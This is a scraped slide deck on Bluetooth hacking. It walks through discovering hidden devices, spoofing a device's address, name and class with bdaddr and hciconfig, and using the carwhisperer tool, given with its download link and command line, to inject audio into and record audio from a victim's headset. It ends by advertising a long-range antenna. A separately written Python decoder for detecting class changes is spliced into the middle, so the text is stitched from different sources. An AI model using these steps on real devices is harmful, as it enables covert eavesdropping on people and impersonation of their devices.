Post on 24-Jun-2015
By Swaroop YermalkaR
1. Finding Visible & Invisible Bluetooth Devices along with their specifications
2. Cloning Bluetooth Devices
3. Remotely Inject audio in Bluetooth headsets and record audio from it.
BT5 r3 laptop
Galaxy pop
Nokia Bluetooth Headset
Bluetooth Dongle
79 channels 2.4-GHz ISM band
Devices hop across these channels at a rate of 1600 times per second
Bluetooth Device Address (BD_ADDR)
Source: www.techtree.com
Initial Setup
1. Everything is visible
Android Settings Ubuntu Settings
#hcitool scan
#hcitool inq
Find a target First
btscanner
Bluemaho
2. Let’s Find the Invisible Devices…
Source: http://hwaddress.com/
Android Settings
Start sniffing
Sniff on mon0
SAMSUNG
It is a Samsung device
We have: 00:07:AB:ff:CF:88
~MAC address minus one
~ MAC address minus 1
~MAC address plus one
FOUND!!!
#hcitool inq <bd_addr>
Enumerate the services for further attack
Recall Previous Information…
#bdaddr -i hci1 <new_bd_addr>
#hcitool scan
#hciconfig hci1 name "android"
#hciconfig hci0 class 0x58020c
Observe the Fields
Laptop
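The class value set above, 0x58020c, packs three fields (service classes, major class, minor class) that any device can declare for itself. As an added example, not part of the original slides, this Python decoder splits a class value into those fields and flags a known address whose advertised class has changed; the field names follow the Bluetooth Assigned Numbers, and the inventory and addresses are constructed.

```python
# Added example: decode a Bluetooth Class of Device (CoD) value.
# Field layout and names follow the Bluetooth Assigned Numbers (baseband).
SERVICE_BITS = {
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer",
    21: "Audio", 22: "Telephony", 23: "Information",
}
MAJOR = {
    0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network Access Point",
    4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable",
    8: "Toy", 9: "Health", 31: "Uncategorized",
}
MINOR = {  # only the major classes that appear on this page
    1: {1: "Desktop", 2: "Server", 3: "Laptop", 4: "Handheld PC/PDA"},
    2: {1: "Cellular", 2: "Cordless", 3: "Smartphone"},
    4: {1: "Wearable Headset", 2: "Hands-free", 6: "Headphones"},
}

def decode_cod(cod):
    """Split a 24-bit CoD into format, major, minor and service classes."""
    if not 0 <= cod <= 0xFFFFFF:
        raise ValueError("Class of Device is a 24-bit value")
    major = (cod >> 8) & 0x1F   # bits 12..8
    minor = (cod >> 2) & 0x3F   # bits 7..2
    return {
        "format": cod & 0x3,    # bits 1..0
        "major": MAJOR.get(major, "Reserved (%d)" % major),
        "minor": MINOR.get(major, {}).get(minor, "Unknown (%d)" % minor),
        "services": [n for b, n in sorted(SERVICE_BITS.items()) if (cod >> b) & 1],
    }

def class_drift(baseline, observed):
    """Return known BD_ADDRs whose advertised class differs from the inventory."""
    alerts = {}
    for addr, cod in observed.items():
        known = baseline.get(addr.upper())
        if known is not None and known != cod:
            alerts[addr.upper()] = (decode_cod(known)["minor"],
                                    decode_cod(cod)["minor"])
    return alerts

if __name__ == "__main__":
    print(decode_cod(0x58020C))                 # class value from the slide
    baseline = {"AA:BB:CC:DD:EE:01": 0x00010C}  # constructed inventory entry
    observed = {"aa:bb:cc:dd:ee:01": 0x200404}  # constructed scan result
    print(class_drift(baseline, observed))
```

Because the class is self-declared, a match proves nothing about the device; only a change on a known address is a useful signal.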
Why Clone the Bluetooth Device?
On certain premises, some types of Bluetooth device may be restricted. Does it still bother you?
For many attacks, such as attacks on Bluetooth headsets, it is necessary to make our device headset compatible.
Is our Bluetooth dongle headset compatible?
No? Change its class.
Device conforms to the Headset Profile
Find your victim
Download url: http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
#./carwhisperer <interface> <injecting audio file> <Output file> <victim BD_ADDR>
Built on AIRcable XR™ long-range technology
1 km external antenna included
Extended range for up to 30 km***
No external power needed
Aluminum case for reduced interference and increased sensitivity
Yi-Bing Lin
1. Bluetooth Hacking: The state of art by trifinite.org
2. Bluetooth Wiki
www.chmag.in
Nov-2012, Sep-2012, Oct-2012
Feedback, questions and suggestions:
swaroop.wireless@gmail.com